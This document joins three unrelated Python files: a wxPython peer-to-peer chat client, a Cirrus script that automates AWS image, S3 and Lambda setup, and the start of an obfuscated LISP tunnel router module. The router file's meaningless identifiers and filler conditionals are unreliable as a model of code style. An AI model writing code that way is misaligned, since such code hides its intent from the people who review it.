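    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    try:
        s.connect(('8.8.8.8', 80))
        return s.getsockname()[0]
    finally:
        s.close()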
class MyServer(socket.socket):
def __init__(self):
socket.socket.__init__(self,socket.AF_INET,socket.SOCK_STREAM)
self.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.bind((Data.GetLocalIp(),Data.GetServerPort()))
self.listen(1)
def CreateMyServer(self):
try:
self.conn, self.add = self.accept()
except Exception as e:
self.close()
if ChatWindow.tclock.acquire():
#newWin.outMsg.Clear()
#newWin.outMsg.AppendText(str(e)+'1\n')
ChatWindow.tclock.release()
else:
newWin.Connected(False,self.add[0])
self.SeReceive()
def SeReceive(self):
while True:
try:
info = self.conn.recv(1024).decode()
except Exception as e:
self.close()
if ChatWindow.tclock.acquire():
newWin.outMsg.Clear()
newWin.outMsg.AppendText(str(e)+'\n')
ChatWindow.tclock.release()
newWin.StartServer()
break
else:
if ChatWindow.tclock.acquire():
ll = newWin.outMsg.GetLastPosition()
newWin.outMsg.AppendText(info+'\n')
l = newWin.outMsg.GetLastPosition()
newWin.outMsg.SetStyle(ll,l,MyStyle(StyleList.RECE))
ChatWindow.tclock.release()
class MyClient(socket.socket):
def __init__(self):
socket.socket.__init__(self,socket.AF_INET,socket.SOCK_STREAM)
self.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.bind((Data.GetLocalIp(),Data.GetClientPort()))
return
def CreatMyClient(self):
try:
self.connect((Data.GetRemoteIp(),Data.GetServerPort()))
except Exception as e:
self.close()
if ChatWindow.tclock.acquire():
newWin.outMsg.Clear()
newWin.outMsg.AppendText(str(e)+'\n')
ChatWindow.tclock.release()
newWin.StartServer()
else:
newWin.Connected(True,Data.GetRemoteIp())
self.Receive()
def Receive(self):
while True:
try:
info = self.recv(1024).decode()
except Exception as e:
self.close()
if ChatWindow.tclock.acquire():
newWin.outMsg.Clear()
newWin.outMsg.AppendText(str(e)+'\n')
ChatWindow.tclock.release()
newWin.StartServer()
break
else:
if ChatWindow.tclock.acquire():
ll = newWin.outMsg.GetLastPosition()
newWin.outMsg.AppendText(info+'\n')
l = newWin.outMsg.GetLastPosition()
newWin.outMsg.SetStyle(ll,l,MyStyle(StyleList.RECE))
ChatWindow.tclock.release()
class ChatWindow(wx.Frame):
tclock = threading.Lock()
flag = False
def __init__(self, parent, title):
super().__init__(parent,title=title,size=(400,600))
self.InitUI()
self.Center()
self.Show()
self.StartServer()
def InitUI(self):
self.panel = wx.Panel(self)
self.hostAddress = wx.TextCtrl(self.panel, style = wx.TE_RICH|wx.TE_RICH2)
self.inputMsg = wx.TextCtrl(self.panel, style = wx.TE_RICH|wx.TE_RICH2|wx.TE_PROCESS_ENTER)
self.inputMsg.Bind(wx.EVT_TEXT_ENTER,self.SentEvent)
self.connectButton = wx.Button(self.panel,label = '连接')
self.connectButton.Bind(wx.EVT_BUTTON,self.ClickConnectButton)
self.outMsg = wx.TextCtrl(self.panel, style = wx.TE_MULTILINE|wx.TE_READONLY|wx.TE_RICH|wx.TE_RICH2)
self.hBox1 = wx.BoxSizer(wx.HORIZONTAL)
self.hBox2 = wx.BoxSizer(wx.HORIZONTAL)
self.vBox = wx.BoxSizer(wx.VERTICAL)
self.hBox1.Add(self.hostAddress, proportion = 10, flag = wx.EXPAND|wx.ALL, border = 3)
self.hBox1.Add(self.connectButton, proportion = 1, flag = wx.EXPAND|wx.ALL, border = 3)
self.hBox2.Add(self.inputMsg, proportion = 10, flag = wx.EXPAND|wx.ALL, border = 3)
self.vBox.Add(self.hBox1, proportion = 1, flag = wx.EXPAND|wx.ALL,border = 3)
self.vBox.Add(self.outMsg, proportion = 10, flag = wx.EXPAND|wx.ALL,border = 6)
self.vBox.Add(self.hBox2, proportion = 1, flag = wx.EXPAND|wx.ALL,border = 3)
self.panel.SetSizer(self.vBox) # set the main sizer
self.Bind(wx.EVT_CLOSE, self.OnCloseWindow)
def OnCloseWindow(self, event):
dial = wx.MessageDialog(None, 'Are you sure you want to quit?','Question', wx.YES_NO | wx.NO_DEFAULT | wx.ICON_QUESTION)
ret = dial.ShowModal()
if ret == wx.ID_YES:
self.server.close()
try:
self.client.close()
except:
pass
self.Destroy()
else:
event.Veto()
def ClickConnectButton(self, event):
if ChatWindow.flag == False:
self.server.close()
self.client = MyClient()
Data.SetRemoteIp(self.hostAddress.GetValue())
self.hostAddress.Clear()
self.hostAddress.Enable(False)
self.connectButton.Enable(False)
self.outMsg.Clear()
self.outMsg.AppendText("连接中………………\n")
self.ctd = threading.Thread(target = self.client.CreatMyClient)
self.ctd.start()
elif ChatWindow.flag == True:
try:
self.server.conn.close()
except:
pass
finally:
try:
self.server.close()
except:
pass
try:
self.client.close()
except:
pass
self.outMsg.AppendText("已断开\n")
def SentEvent(self, event):
if self.std.is_alive():
try:
self.server.conn.send(self.inputMsg.GetValue().encode())
except Exception as e:
if ChatWindow.tclock.acquire():
newWin.outMsg.Clear()
newWin.outMsg.AppendText(str(e)+'\n')
ChatWindow.tclock.release()
elif self.ctd.is_alive():
try:
self.client.send(self.inputMsg.GetValue().encode())
except Exception as e:
if ChatWindow.tclock.acquire():
newWin.outMsg.Clear()
newWin.outMsg.AppendText(str(e)+'\n')
ChatWindow.tclock.release()
if ChatWindow.tclock.acquire():
ll = self.outMsg.GetLastPosition()
self.outMsg.AppendText(self.inputMsg.GetValue() +'\n')
l = self.outMsg.GetLastPosition()
self.outMsg.SetStyle(ll,l,MyStyle(StyleList.SEND))
self.inputMsg.Clear()
self.inputMsg.SetDefaultStyle(MyStyle())
ChatWindow.tclock.release()
def StartServer(self):
ChatWindow.flag = False
self.hostAddress.Enable(True)
self.hostAddress.SetDefaultStyle(MyStyle())
self.connectButton.Enable(True)
self.connectButton.SetLabel("连接")
self.inputMsg.Enable(False)
self.inputMsg.SetDefaultStyle(MyStyle())
self.outMsg.SetDefaultStyle(MyStyle(StyleList.OUTPUT))
self.outMsg.AppendText('==========================\n')
self.outMsg.AppendText('请输入对方IP进行连接\n')
self.outMsg.AppendText('******或者****************\n')
self.outMsg.AppendText('等待对方与你进行连接\n')
self.outMsg.AppendText('--------------------------\n')
self.outMsg.AppendText('你的IP为:【' + Data.GetLocalIp() + '】\n')
self.outMsg.AppendText('==========================\n')
self.server = MyServer()
self.std = threading.Thread(target = self.server.CreateMyServer)
self.std.start()
def Connected(self,mode,ip = '0.0.0.0'):
ChatWindow.flag = True
self.inputMsg.Enable(True)
self.hostAddress.Clear()
self.hostAddress.Enable(False)
self.connectButton.Enable(True)
self.connectButton.SetLabel("断开")
self.outMsg.Clear()
self.outMsg.AppendText("==================================\n")
if mode == True:
self.outMsg.AppendText("【你】已与【" + ip + "】连接成功\n")
else:
self.outMsg.AppendText("【" + ip + "】"+ "已与【你】连接成功\n")
self.outMsg.AppendText("**********************************\n")
self.outMsg.AppendText("【你们】可以愉快的进行聊天了\n")
self.outMsg.AppendText("==================================\n")
if __name__ == "__main__":
app = wx.App()
newWin = ChatWindow(None, title='ZZ_CHAT')
app.MainLoop()
|
automate.py
|
import logging
import time
import io
import zipfile
import json
import threading
import inspect
import datetime
from . import handler
from . import configuration
from .instance import Instance
from . import utilities
from .resources import resources
# The type of instance to use for compilation.
BUILD_INSTANCE_TYPE = "c4.4xlarge"
# The disk size, in GB, to use for compilation.
BUILD_INSTANCE_SIZE = 32
# The type of instance to use for creating server images.
SERVER_INSTANCE_TYPE = "m4.2xlarge"
# The disk size, in GB, to use for parameter servers.
SERVER_INSTANCE_SIZE = 1
# The base AMI to use for making the Amazon Linux build image. Gives the AMI ID
# for each supported region. This is "amzn-ami-hvm-2017.03.1.20170812
# -x86_64-gp2", which is recommended by AWS as of Sep 27, 2018 for compiling
# executables for Lambda.
AMAZON_BASE_IMAGES = {
"us-east-1": "ami-4fffc834",
"us-east-2": "ami-ea87a78f",
"us-west-1": "ami-3a674d5a",
"us-west-2": "ami-aa5ebdd2"
}
# The base AMI to use for making the Ubuntu build image. Gives the AMI ID for
# each supported region. This is "Ubuntu Server 18.04 LTS (HVM), SSD Volume
# Type", found in the AWS console.
UBUNTU_BASE_IMAGES = {
"us-east-1": "ami-0ac019f4fcb7cb7e6",
"us-east-2": "ami-0f65671a86f061fcd",
"us-west-1": "ami-063aa838bd7631e0b",
"us-west-2": "ami-0bbe6b35405ecebdb"
}
# The ARN of an IAM policy that allows read-only access to S3.
S3_READ_ONLY_ARN = "arn:aws:iam::aws:policy/AmazonS3ReadOnlyAccess"
# The ARN of an IAM policy that allows write access to Cloudwatch logs.
CLOUDWATCH_WRITE_ARN = "arn:aws:iam::aws:policy/service-role/" \
"AWSLambdaBasicExecutionRole"
# The base name of the bucket created by Cirrus in users' AWS accounts.
BUCKET_BASE_NAME = "cirrus-bucket"
# The estimated delay of IAM's eventual consistency, in seconds.
IAM_CONSISTENCY_DELAY = 20
# The filenames of Cirrus' executables.
EXECUTABLES = ("parameter_server", "ps_test", "csv_to_libsvm")
# The level of compression to use when creating the Lambda ZIP package.
LAMBDA_COMPRESSION = zipfile.ZIP_DEFLATED
# The name to give to the file containing the Lambda's handler code.
LAMBDA_HANDLER_FILENAME = "handler.py"
# The estimated delay of S3's eventual consistency, in seconds.
S3_CONSISTENCY_DELAY = 20
# The runtime for the worker Lambda.
LAMBDA_RUNTIME = "python3.6"
# The fully-qualified identifier of the handler of the worker Lambda.
LAMBDA_HANDLER_FQID = "handler.run"
# The maximum execution time to give the worker Lambda, in seconds.
LAMBDA_TIMEOUT = 5 * 60
# The maximum amount of time that we will wait after invoking a Lambda in order
# to read its output, in seconds.
LAMBDA_READ_TIMEOUT = LAMBDA_TIMEOUT + 30
# The level of logs that the worker Lambda should write to CloudWatch.
LAMBDA_LOG_LEVEL = "DEBUG"
# The maximum number of generations of Lambdas that will be invoked to serve
# as the worker with a given ID.
MAX_LAMBDA_GENERATIONS = 10000
# The maximum number of workers that may work on a given experiment. This is
# 1000 because the worker ID is given 3 digits in the task ID that workers use
# to register.
MAX_WORKERS_PER_EXPERIMENT = 1000
# The minimum number of seconds that must pass between two Lambda invocations
# for a worker.
MIN_GENERATION_TIME = 10
# The minimum number of concurrent executions that AWS requires an account to
# keep unreserved. Current as of 11/21/18.
_MINIMUM_UNRESERVED_CONCURRENCY = 100
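# Illustrative sketch only (not part of the original module): how the constants
# above combine into the task ID that a worker uses to register with the
# parameter server. The worker_id and generation values are hypothetical.
def _example_task_id(worker_id=7, generation=3):
    # Worker 7, generation 3 -> 7 * 10000 + 3 = 70003
    return worker_id * MAX_LAMBDA_GENERATIONS + generation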
def make_amazon_build_image(name):
"""Make an Amazon Linux AMI suitable for compiling Cirrus on.
Deletes any existing AMI with the same name. The resulting AMI will be
private.
Args:
name (str): The name to give the AMI.
"""
log = logging.getLogger("cirrus.automate.make_amazon_build_image")
log.debug("Deleting any existing images with the same name.")
Instance.delete_images(name)
log.debug("Launching an instance.")
region = configuration.config()["aws"]["region"]
instance = Instance("cirrus_make_amazon_build_image",
ami_id=AMAZON_BASE_IMAGES[region],
disk_size=BUILD_INSTANCE_SIZE,
typ=BUILD_INSTANCE_TYPE,
username="ec2-user")
instance.start()
log.debug("Setting up the environment.")
# Install some necessary packages.
instance.run_command("yes | sudo yum install git "
"glibc-static openssl-static.x86_64 zlib-static.x86_64 libcurl-devel")
instance.run_command("yes | sudo yum groupinstall \"Development Tools\"")
# Install some useful tools.
instance.run_command("yes | sudo yum install gdb")
instance.run_command("yes | sudo yum install htop")
instance.run_command("yes | sudo yum install mosh")
# The above installed a recent version of gcc, but an old version of g++.
# Install a newer version of g++.
instance.run_command("yes | sudo yum remove gcc48-c++")
instance.run_command("yes | sudo yum install gcc72-c++")
# The above pulled in an old version of cmake. Install a newer version of
# cmake by compiling from source.
instance.run_command(
"wget https://cmake.org/files/v3.10/cmake-3.10.0.tar.gz")
instance.run_command("tar -xvzf cmake-3.10.0.tar.gz")
instance.run_command("cd cmake-3.10.0; ./bootstrap")
instance.run_command("cd cmake-3.10.0; make -j 16")
instance.run_command("cd cmake-3.10.0; sudo make install")
# Install newer versions of as and ld.
instance.run_command("yes | sudo yum install binutils")
# The above pulled in an old version of make. Install a newer version of
# make by compiling from source.
instance.run_command("wget https://ftp.gnu.org/gnu/make/make-4.2.tar.gz")
instance.run_command("tar -xf make-4.2.tar.gz")
instance.run_command("cd make-4.2; ./configure")
instance.run_command("cd make-4.2; make -j 16")
instance.run_command("cd make-4.2; sudo make install")
instance.run_command("sudo ln -sf /usr/local/bin/make /usr/bin/make")
# Compile glibc from source with static NSS. Use the resulting libpthread.a
# instead of the default.
instance.run_command("git clone git://sourceware.org/git/glibc.git")
instance.run_command("cd glibc; git checkout release/2.28/master")
instance.run_command("mkdir glibc/build")
instance.run_command("cd glibc/build; ../configure --disable-sanity-checks "
"--enable-static-nss --prefix ~/glibc_build")
instance.run_command("cd glibc/build; make -j 16")
instance.run_command("cd glibc/build; make install")
instance.run_command("sudo cp ~/glibc_build/lib/libpthread.a "
"/usr/lib64/libpthread.a")
instance.run_command("sudo cp ~/glibc_build/lib/libc.a /usr/lib64/libc.a")
log.debug("Saving the image.")
instance.save_image(name, False)
log.debug("Terminating the instance.")
instance.cleanup()
def make_ubuntu_build_image(name):
"""Make an Ubuntu AMI suitable for compiling Cirrus on.
Deletes any existing AMI with the same name. The resulting AMI will be
private.
Args:
name (str): The name to give the AMI.
"""
log = logging.getLogger("cirrus.automate.make_ubuntu_build_image")
log.debug("Deleting any existing images with the same name.")
Instance.delete_images(name)
log.debug("Launching an instance.")
region = configuration.config()["aws"]["region"]
instance = Instance("cirrus_make_ubuntu_build_image",
ami_id=UBUNTU_BASE_IMAGES[region],
disk_size=BUILD_INSTANCE_SIZE,
typ=BUILD_INSTANCE_TYPE,
username="ubuntu")
instance.start()
log.debug("Setting up the environment.")
# Sometimes `apt-get update` doesn't work, returning exit code 100.
while True:
status, _, _ = instance.run_command("sudo apt-get update", False)
if status == 0:
break
instance.run_command("yes | sudo apt-get install build-essential cmake \
automake zlib1g-dev libssl-dev libcurl4-nss-dev \
bison libldap2-dev libkrb5-dev")
instance.run_command("yes | sudo apt-get install awscli")
# Install some useful tools.
instance.run_command("yes | sudo apt-get install gdb")
instance.run_command("yes | sudo apt-get install htop")
instance.run_command("yes | sudo apt-get install mosh")
log.debug("Saving the image.")
instance.save_image(name, False)
log.debug("Terminating the instance.")
instance.cleanup()
def make_executables(path, image_owner_name, username):
"""Compile Cirrus and publish its executables.
Overwrites any existing S3 objects with the same name. The resulting S3
objects will be public.
Args:
path (str): An S3 path to a "directory" in which to publish the
executables.
image_owner_name (tuple[str, str]): The owner and name of the AMI to
compile on. As for `Instance.__init__`.
username (str): The SSH username to use with the AMI.
"""
log = logging.getLogger("cirrus.automate.make_executables")
log.debug("Launching an instance.")
instance = Instance("cirrus_make_executables",
ami_owner_name=image_owner_name,
disk_size=BUILD_INSTANCE_SIZE,
typ=BUILD_INSTANCE_TYPE,
username=username)
instance.start()
log.debug("Building Cirrus.")
instance.run_command("git clone https://github.com/jcarreira/cirrus.git")
instance.run_command("cd cirrus; ./bootstrap.sh")
instance.run_command("cd cirrus; make -j 16")
log.debug("Publishing executables.")
for executable in EXECUTABLES:
instance.upload_s3("~/cirrus/src/%s" % executable,
path + "/" + executable, public=True)
log.debug("Terminating the instance.")
instance.cleanup()
log.debug("Done.")
def make_lambda_package(path, executables_path):
"""Make and publish the ZIP package for Cirrus' Lambda function.
Args:
path (str): An S3 path at which to publish the package.
executables_path (str): An S3 path to a "directory" from which to get
Cirrus' executables.
"""
assert path.startswith("s3://")
assert executables_path.startswith("s3://")
log = logging.getLogger("cirrus.automate.make_lambda_package")
log.debug("Initializing ZIP file.")
file = io.BytesIO()
with zipfile.ZipFile(file, "w", LAMBDA_COMPRESSION) as zip:
log.debug("Writing handler.")
info = zipfile.ZipInfo(LAMBDA_HANDLER_FILENAME)
info.external_attr = 0o777 << 16 # Gives execute permission.
handler_source = inspect.getsource(handler)
zip.writestr(info, handler_source)
log.debug("Initializing S3.")
executable = io.BytesIO()
log.debug("Downloading executable.")
executables_path += "/amazon/parameter_server"
bucket, key = _split_s3_url(executables_path)
resources.s3_client.download_fileobj(bucket, key, executable)
log.debug("Writing executable.")
info = zipfile.ZipInfo("parameter_server")
info.external_attr = 0o777 << 16 # Gives execute permission.
executable.seek(0)
zip.writestr(info, executable.read())
log.debug("Uploading package.")
file.seek(0)
bucket, key = _split_s3_url(path)
resources.s3_client.upload_fileobj(file, bucket, key,
ExtraArgs={"ACL": "public-read"})
log.debug("Waiting for changes to take effect.")
# Waits for S3's eventual consistency to catch up. Ideally, something more
# sophisticated would be used since the delay distribution is
# heavy-tailed. But this should in most cases ensure the package is
# visible on S3 upon return.
time.sleep(S3_CONSISTENCY_DELAY)
log.debug("Done.")
def make_server_image(name, executables_path):
"""Make an AMI that runs parameter servers.
Args:
name (str): The name to give the AMI.
executables_path (str): An S3 path to a "directory" from which to get
Cirrus' executables.
"""
assert executables_path.startswith("s3://")
log = logging.getLogger("cirrus.automate.make_server_image")
log.debug("Checking for already-existent images.")
Instance.delete_images(name)
log.debug("Launching an instance.")
region = configuration.config()["aws"]["region"]
instance = Instance("cirrus_make_server_image",
ami_id=UBUNTU_BASE_IMAGES[region],
disk_size=SERVER_INSTANCE_SIZE,
typ=SERVER_INSTANCE_TYPE,
username="ubuntu")
instance.start()
log.debug("Putting parameter_server executable on instance.")
instance.download_s3(executables_path + "/ubuntu/parameter_server",
"~/parameter_server")
log.debug("Setting permissions of executable.")
instance.run_command("chmod +x ~/parameter_server")
log.debug("Creating image from instance.")
instance.save_image(name, False)
log.debug("Terminating the instance.")
instance.cleanup()
log.debug("Done.")
def get_bucket_name():
"""Get the name of Cirrus' S3 bucket in the user's AWS account.
Returns:
str: The name.
"""
log = logging.getLogger("cirrus.automate.get_bucket_name")
log.debug("Retreiving account ID.")
account_id = resources.sts_client.get_caller_identity().get("Account")
return BUCKET_BASE_NAME + "-" + account_id
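# Illustrative only (not part of the original module): with an AWS account ID
# of "123456789012", get_bucket_name() above would return
# "cirrus-bucket-123456789012".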
def set_up_bucket():
"""Set up Cirrus' S3 bucket in the user's AWS account.
"""
log = logging.getLogger("cirrus.automate.set_up_bucket")
log.debug("Checking for existing bucket.")
response = resources.s3_client.list_buckets()
exists = False
bucket_name = get_bucket_name()
for bucket_info in response["Buckets"]:
if bucket_info["Name"] == bucket_name:
exists = True
break
if exists:
log.debug("Deleting contents of existing bucket.")
bucket = resources.s3_resource.Bucket(bucket_name)
for obj in bucket.objects.all():
obj.delete()
log.debug("Deleting existing bucket.")
bucket.delete()
log.debug("Creating bucket.")
constraint = configuration.config()["aws"]["region"]
bucket_config = {
"LocationConstraint": constraint
}
# Per https://docs.aws.amazon.com/general/latest/gr/rande.html#s3_region, no
# constraint should be provided when referring to the us-east-1 region.
if constraint == "us-east-1":
resources.s3_resource.create_bucket(
Bucket=bucket_name
)
else:
resources.s3_resource.create_bucket(
Bucket=bucket_name,
CreateBucketConfiguration=bucket_config
)
def get_available_concurrency():
"""Get the number of unreserved concurrent executions available in the
current AWS account.
Returns:
int: The number of executions.
"""
log = logging.getLogger("cirrus.automate.get_available_concurrency")
log.debug("Getting account settings.")
response = resources.lambda_client.get_account_settings()
unreserved = response["AccountLimit"]["UnreservedConcurrentExecutions"]
available = unreserved - _MINIMUM_UNRESERVED_CONCURRENCY
log.debug("Done.")
return available
def set_up_lambda_role(name):
"""Set up the IAM role for the worker Lambda function.
Deletes any existing role with the same name. This role gives read access to
S3 and full access to Cloudwatch Logs.
Args:
name (str): The name to give the role.
"""
log = logging.getLogger("cirrus.automate.set_up_lambda_role")
log.debug("Checking for an already-existing role.")
try:
role = resources.iam_resource.Role(name)
for policy in role.attached_policies.all():
role.detach_policy(PolicyArn=policy.arn)
role.delete()
log.info("There was an already-existing role.")
except Exception:
# FIXME: This is a hack. An error may be caused by something other than
# the role not existing. We should catch only that specific error.
log.info("There was not an already-existing role.")
log.debug("Creating role.")
role = resources.iam_resource.create_role(
RoleName=name,
AssumeRolePolicyDocument=\
"""{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Principal": {
"Service": "lambda.amazonaws.com"
},
"Action": "sts:AssumeRole"
}
]
}"""
)
role.attach_policy(PolicyArn=S3_READ_ONLY_ARN)
role.attach_policy(PolicyArn=CLOUDWATCH_WRITE_ARN)
log.debug("Done.")
def make_lambda(name, lambda_package_path, lambda_size, concurrency=-1):
"""Make a worker Lambda function.
Replaces any existing Lambda function with the same name.
Args:
name (str): The name to give the Lambda.
lambda_package_path (str): An S3 path to a Lambda ZIP package produced
by `make_lambda_package`.
lambda_size (int): The amount of memory (in MB) to give to the Lambda
function. Must be a size supported by AWS. As of 11/24/18, the
supported sizes are multiples of 64 in [128, 3008].
concurrency (int): The number of reserved concurrent executions to
allocate to the Lambda. If omitted or -1, the Lambda will use the
account's unreserved concurrent executions in the region.
"""
assert 128 <= lambda_size <= 3008, \
"lambda_size %d is not in [128, 3008]." % lambda_size
assert lambda_size % 64 == 0, \
"lambda_size %d is not divisible by 64." % lambda_size
from . import setup
assert isinstance(concurrency, int)
assert concurrency >= -1
log = logging.getLogger("cirrus.automate.make_lambda")
log.debug("Deleting any existing Lambda.")
try:
resources.lambda_client.delete_function(FunctionName=name)
except Exception:
# This is a hack. An error may be caused by something other than the
# Lambda not existing.
pass
log.debug("Copying package to user's bucket.")
bucket_name = get_bucket_name()
bucket = resources.s3_resource.Bucket(bucket_name)
src_bucket, src_key = _split_s3_url(lambda_package_path)
src = {"Bucket": src_bucket, "Key": src_key}
bucket.copy(src, src_key)
log.debug("Creating Lambda.")
role_arn = resources.iam_resource.Role(setup.LAMBDA_ROLE_NAME).arn
resources.lambda_client.create_function(
FunctionName=name,
Runtime=LAMBDA_RUNTIME,
Role=role_arn,
Handler=LAMBDA_HANDLER_FQID,
Code={
"S3Bucket": bucket_name,
"S3Key": src_key
},
Timeout=LAMBDA_TIMEOUT,
MemorySize=lambda_size
)
if concurrency != -1:
log.debug("Allocating reserved concurrent executions to the Lambda.")
resources.lambda_client.put_function_concurrency(
FunctionName=name,
ReservedConcurrentExecutions=concurrency
)
log.debug("Done.")
def delete_lambda(name):
"""Delete a Lambda function.
Args:
name (str): The name of the Lambda function.
"""
log = logging.getLogger("cirrus.automate.delete_lambda")
log.debug("Deleting Lambda function %s." % name)
resources.lambda_client.delete_function(FunctionName=name)
@utilities.jittery_exponential_backoff(("TooManyRequestsException",), 2, 4, 3)
def launch_worker(lambda_name, task_id, config, num_workers, ps):
"""Launch a worker.
Blocks until the worker terminates.
Args:
lambda_name (str): The name of a worker Lambda function.
task_id (int): The ID number of the task, to be used by the worker to
register with the parameter server.
config (str): A configuration for the worker.
num_workers (int): The total number of workers that are being launched.
ps (ParameterServer): The parameter server that the worker should use.
Raises:
RuntimeError: If the invocation of the Lambda function fails.
"""
log = logging.getLogger("cirrus.automate.launch_worker")
log.debug("Launching Task %d." % task_id)
payload = {
"config": config,
"num_workers": num_workers,
"ps_ip": ps.public_ip(),
"ps_port": ps.ps_port(),
"task_id": task_id,
"log_level": LAMBDA_LOG_LEVEL
}
response = resources.lambda_client_no_retries.invoke(
FunctionName=lambda_name,
InvocationType="RequestResponse",
LogType="Tail",
Payload=json.dumps(payload)
)
status = response["StatusCode"]
message = "Task %d completed with status code %d." \
% (task_id, status)
if status == 200:
log.debug(message)
else:
raise RuntimeError(message)
def maintain_workers(n, config, ps, stop_event, experiment_id, lambda_size):
"""Maintain a fixed-size fleet of workers.
Creates a worker Lambda function to invoke.
Args:
n (int): The number of workers.
config (str): As for `launch_worker`.
ps (ParameterServer): As for `launch_worker`.
stop_event (threading.Event): An event indicating that no new
generations of the workers in the fleet should be launched.
experiment_id (int): The ID number of the experiment that these workers
will work on.
lambda_size (int): As for `make_lambda`.
"""
# Imported here to prevent a circular dependency issue.
from . import setup
# See the documentation for the constant.
assert n <= MAX_WORKERS_PER_EXPERIMENT
# Creates a Lambda function to invoke. Names it uniquely with the
# `experiment_id`, current date, and current time.
now = datetime.datetime.now()
lambda_id = "%d_%d-%d-%d_%d-%d-%d-%d" % (experiment_id, now.year, now.month,
now.day, now.hour, now.minute, now.second, now.microsecond)
lambda_name = setup.LAMBDA_NAME_PREFIX + "_" + lambda_id
lambda_package_path = setup.PUBLISHED_BUILD + "/lambda_package"
concurrency = int(configuration.config()["aws"]["lambda_concurrency_limit"])
make_lambda(lambda_name, lambda_package_path, lambda_size, concurrency)
def clean_up():
"""Clean up after the run.
Deletes the Lambda that was created.
"""
stop_event.wait()
delete_lambda(lambda_name)
def maintain_one(worker_id):
"""Maintain a single worker.
Launches generation after generation of Lambdas to serve as the
`worker_id`-th worker.
Args:
worker_id (int): The ID of the worker, in `[0, n)`.
"""
generation = 0
while not stop_event.is_set():
assert generation < MAX_LAMBDA_GENERATIONS
task_id = worker_id * MAX_LAMBDA_GENERATIONS + generation
start = time.time()
launch_worker(lambda_name, task_id, config, n, ps)
duration = time.time() - start
if duration < MIN_GENERATION_TIME:
time.sleep(MIN_GENERATION_TIME - duration)
generation += 1
# Start the `clean_up` thread. Return immediately.
thread_name = "Exp #%02d Cleanup" % experiment_id
thread = threading.Thread(target=clean_up, name=thread_name)
thread.start()
# Start one `maintain_one` thread per worker desired. Return immediately.
base_id = experiment_id * MAX_WORKERS_PER_EXPERIMENT
for worker_id in range(base_id, base_id + n):
thread_name = "Exp #%02d Wkr #%02d" % (experiment_id, worker_id)
thread = threading.Thread(target=maintain_one, name=thread_name,
args=(worker_id,))
thread.start()
def _split_s3_url(url):
assert url.startswith("s3://")
bucket = url[len("s3://"):].split("/")[0]
key = url[len("s3://") + len(bucket) + 1:]
return bucket, key
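# Illustrative sketch only (not part of the original module): expected behavior
# of _split_s3_url on a sample URL.
#   _split_s3_url("s3://my-bucket/path/to/key") -> ("my-bucket", "path/to/key")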
|
lisp-itr.py
|
# -----------------------------------------------------------------------------
#
# Copyright 2013-2019 lispers.net - Dino Farinacci <farinacci@gmail.com>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# -----------------------------------------------------------------------------
#
# lisp-itr.py
#
# This file performs LISP Ingress Tunnel Router (ITR) functionality.
#
# -----------------------------------------------------------------------------
if 64 - 64: i11iIiiIii
import lisp
import lispconfig
import socket
import select
import threading
import pcappy
import time
import os
import commands
import struct
if 65 - 65: O0 / iIii1I11I1II1 % OoooooooOO - i1IIi
if 73 - 73: II111iiii
if 22 - 22: I1IiiI * Oo0Ooo / OoO0O00 . OoOoOO00 . o0oOOo0O0Ooo / I1ii11iIi11i
if 48 - 48: oO0o / OOooOOo / I11i / Ii1I
if 48 - 48: iII111i % IiII + I1Ii111 / ooOoO0o * Ii1I
if 46 - 46: ooOoO0o * I11i - OoooooooOO
II1iII1i = [ None , None , None ]
oO0oIIII = None
Oo0oO0oo0oO00 = None
i111I = None
II1Ii1iI1i = None
iiI1iIiI = lisp . lisp_get_ephemeral_port ( )
OOo = lisp . lisp_get_ephemeral_port ( )
Ii1IIii11 = None
Oooo0000 = None
i11 = None
I11 = None
if 98 - 98: i11iIiiIii * I1IiiI % iII111i * iII111i * II111iiii
if 79 - 79: IiII
if 86 - 86: OoOoOO00 % I1IiiI
if 80 - 80: OoooooooOO . I1IiiI
if 87 - 87: oO0o / ooOoO0o + I1Ii111 - ooOoO0o . ooOoO0o / II111iiii
if 11 - 11: I1IiiI % o0oOOo0O0Ooo - Oo0Ooo
oo0O000OoO = False
if 34 - 34: I11i * I1IiiI
if 31 - 31: II111iiii + OoO0O00 . I1Ii111
if 68 - 68: I1IiiI - i11iIiiIii - OoO0O00 / OOooOOo - OoO0O00 + i1IIi
if 48 - 48: OoooooooOO % o0oOOo0O0Ooo . I1IiiI - Ii1I % i1IIi % OoooooooOO
i1iIIi1 = threading . Lock ( )
if 50 - 50: i11iIiiIii - Ii1I
if 78 - 78: OoO0O00
if 18 - 18: O0 - iII111i / iII111i + ooOoO0o % ooOoO0o - IiII
if 62 - 62: iII111i - IiII - OoOoOO00 % i1IIi / oO0o
if 77 - 77: II111iiii - II111iiii . I1IiiI / o0oOOo0O0Ooo
if 14 - 14: I11i % O0
if 41 - 41: i1IIi + I1Ii111 + OOooOOo - IiII
if 77 - 77: Oo0Ooo . IiII % ooOoO0o
def IIiiIiI1 ( parameter ) :
return ( lispconfig . lisp_itr_rtr_show_command ( parameter , "ITR" , [ ] ) )
if 41 - 41: OoOoOO00
if 13 - 13: Oo0Ooo . i11iIiiIii - iIii1I11I1II1 - OoOoOO00
if 6 - 6: I1IiiI / Oo0Ooo % Ii1I
if 84 - 84: i11iIiiIii . o0oOOo0O0Ooo
if 100 - 100: Ii1I - Ii1I - I1Ii111
if 20 - 20: OoooooooOO
if 13 - 13: i1IIi - Ii1I % oO0o / iIii1I11I1II1 % iII111i
def oo ( parameter ) :
return ( lispconfig . lisp_show_crypto_list ( "ITR" ) )
if 68 - 68: I11i + OOooOOo . iIii1I11I1II1 - IiII % iIii1I11I1II1 - ooOoO0o
if 79 - 79: Oo0Ooo + I1IiiI - iII111i
if 83 - 83: ooOoO0o
if 64 - 64: OoO0O00 % ooOoO0o % iII111i / OoOoOO00 - OoO0O00
if 74 - 74: iII111i * O0
if 89 - 89: oO0o + Oo0Ooo
